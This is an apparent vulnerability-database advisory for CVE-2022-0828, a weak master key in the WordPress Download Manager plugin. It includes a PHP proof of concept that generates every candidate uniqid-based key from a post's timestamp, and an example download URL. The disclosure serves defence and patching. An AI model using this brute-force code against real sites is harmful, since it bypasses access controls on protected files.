WordPress Plugin Vulnerabilities

Download Manager < 3.2.39 - Unauthenticated brute force of files master key

Description

The plugin uses the uniqid php function to generate the master key for a download, allowing an attacker to brute force the key with reasonable resources giving direct download access regardless of role based restrictions or password protections set for the download.

Proof of Concept

<?php

// The full timestamp from the post containing the download (available to unauthenticated user.)
$wordpress_data = "2022-02-03T18:50:35+00:00";
$requestTimestamp = strtotime($wordpress_data);

function uniqidGen($timestamp) {
    return sprintf("%8x%05x",floor($timestamp),($timestamp-floor($timestamp))*1000000);
}

// Generate all possible master keys for the given timestamp (max 1 million keys)
for ($i = 0; $i <= 999999; $i++) {
    echo uniqidGen($requestTimestamp . "." . $i), PHP_EOL;
}

// The dowload link would be something like this:
// https://example.com/download/test-download/?wpdmdl=5&_wpdmkey=6203ab5c2a704

Affects Plugins

Plugin icon
download-manager
Fixed in 3.2.39

References

CVE
CVE-2022-0828

Classification

Type
INSUFFICIENT CRYPTOGRAPHY
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-326
CVSS
5.9 (medium)

Miscellaneous

Original Researcher
Diogo Real
Verified
Yes
WPVDB ID
7f0742ad-6fd7-4258-9e44-d42e138789bb

Timeline

Publicly Published
2022-03-16 (about 2 years ago)
Added
2022-03-16 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2021-10-13
Title
Simple JWT Login < 3.3.0 - Insecure Password Creation
Published
2023-07-14
Title
All-In-One Security (AIOS) – Security and Firewall < 5.2.0 - Insecure Storage of Password
Published
2023-06-06
Title
Abandoned Cart Lite for WooCommerce < 5.15.0 - Authentication Bypass
Published
2022-09-21
Title
Passster < 3.5.5.5.2 - Insecure Storage of Password
Published
2023-10-20
Title
SALESmanago < 3.2.5 - Log Injection via Weak Authentication Token